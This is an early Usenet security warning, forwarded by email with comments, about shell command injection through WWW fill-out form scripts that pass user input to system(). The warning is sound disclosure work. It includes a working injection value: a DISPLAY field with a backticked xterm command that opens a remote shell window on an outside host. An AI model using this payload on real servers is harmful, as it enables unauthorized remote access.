> Jeremy Buhler pointed out this useful summary on the hazards of WWW
> forms. The policy implications: I don't think we can afford to have
> amateurs write the back-end scripts for WWW forms. Pity, but that's
> life.
>
> The same is true, of course, of scripts installed in users' .forward
> files to eat incoming mail, or any other scripts written by Joe User
> which accept input from the net at large.
>
> -- Prentiss
> -----------------------------------------------------------------------
>
> > From: bianco @
MiSTy .
larc .
nasa .
gov (David Bianco)
> > Subject: Be Careful!! Common security vulnerability w/Fill out forms...
> > Newsgroups: comp.infosystems.www
> > Organization: NASA Langley Research Center, Hampton, VA
> >
> > I was hacking together a piece of code the other day to do some
> > gatewaying from our local whois server to the WWW when though about a
> > possible security hole suddenly struck me. I tried it, and to my
> > dismay, it worked... Since it's such an easy problem to have, I
> > thought I'd better share it here. It's probably well-known, but (at
> > least in my case) not well-known enough.
> >
> > Lots of people use input from fill out forms as commandline arguments
> > to the programs they are gatewaying to. This can be good, and it can
> > be bad. It's bad if you do system() or the equivilent, since that
> > will give /bin/sh a chance to parse the commandline before your
> > program ever sees it!
> >
> > As an example, let's say someone writes a gateway to an X11 program
> > which runs on the remote system, and displays on yours (there are a
> > fair number of these on the WWW). Most of the time, they'll ask for a
> > DISPLAY setting to tell them where to show the window. Now, you know
> > they probably didn't rewrite any application code here, so they are
> > going to pass the DISPLAY setting on the commandline to some program.
> > What if you set the DISPLAY to:
> >
> > dew.cs.odu.edu:0.0 `xterm -display dew.cs.odu.edu:0.0`
> >
> > This will frequently have the effect of giving you an xterm under the
> > same UID the WWW server is running under. I tried this. It works.
> > I've already tried it on several WWW servers while I was testing to
> > see how widespread the problem might be. At least one system @ MIT
> > was vulnerable (not anymore, they fixed it almost immediately after I
> > reported it...) as well as some others.
> >
> > If you're running gateways (even just to mail) I urge you to
> > doublecheck to see if you're bitten by this. I hope I didn't give
> > anyone cardiac arrest when they checked their logs! 8-) If I was able
> > to do this successfully, I notified root & webmaster on your machine...
>
--
Regards,
Bill Manning
|
|
